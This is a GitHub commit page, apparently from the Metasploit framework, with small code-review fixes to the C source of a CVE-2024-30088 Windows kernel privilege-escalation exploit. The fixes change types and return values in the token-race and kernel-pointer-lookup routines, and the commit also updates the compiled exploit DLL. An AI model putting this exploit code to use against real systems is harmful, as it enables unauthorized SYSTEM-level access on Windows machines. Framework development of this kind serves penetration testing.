Skip to content

Commit

Permalink
Responded to comments
Browse files Browse the repository at this point in the history
  • Loading branch information
jheysel-r7 committed Aug 30, 2024
1 parent b322343 commit b011b67
Show file tree
Hide file tree
Showing 4 changed files with 7 additions and 8 deletions.
Binary file modified data/exploits/CVE-2024-30088/CVE-2024-30088.x64.dll
Binary file not shown.
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,6 @@
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN

#include "ReflectiveLoader.c"
#include <common.h>
#include <stdio.h>


Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -54,7 +54,7 @@ HANDLE hToken;
BYTE* TokenInfo = 0;
DWORD Infolen = 0x1000;
DWORD retlen = 0;
DWORD OffsetToName = 0;
INT64 OffsetToName = 0;
BYTE* RaceAddr = 0;
ULONGLONG kTokenAddr = 0;

Expand All @@ -75,7 +75,7 @@ HANDLE exploit() {

TokenInfo = (BYTE*)VirtualAlloc(0, Infolen, MEM_COMMIT, PAGE_READWRITE);
if (!TokenInfo)
return -1;
return INVALID_HANDLE_VALUE;

NTSTATUS status = pQueryInfoToken(hToken, (TOKEN_INFORMATION_CLASS)22, TokenInfo, Infolen, &retlen);

Expand All @@ -92,7 +92,7 @@ HANDLE exploit() {
}

if (!OffsetToName)
return -1;
return INVALID_HANDLE_VALUE;


RaceAddr = TokenInfo + OffsetToName;
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@
typedef struct _SYSTEM_HANDLE
{
PVOID Object;
HANDLE UniqueProcessId;
DWORD UniqueProcessId;
HANDLE HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
Expand Down Expand Up @@ -63,17 +63,17 @@ PVOID GetKernelPointerByHandle(HANDLE HandleValue)
for (int i = 0; i < pHandleInfo->HandleCount; i++) {
PVOID object = pHandleInfo->Handles[i].Object;
HANDLE handle = pHandleInfo->Handles[i].HandleValue;
HANDLE pid = pHandleInfo->Handles[i].UniqueProcessId;
DWORD pid = pHandleInfo->Handles[i].UniqueProcessId;

if ((DWORD)pid == CurrentPid && handle == HandleValue) {
if (pid == CurrentPid && handle == HandleValue) {
return object;
}

}
return 0;
}

ULONG GetPidByName(const wchar_t* procname) {
ULONG GetPidByName(const char* procname) {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
ULONG pid;
Expand Down

0 comments on commit b011b67

Please sign in to comment.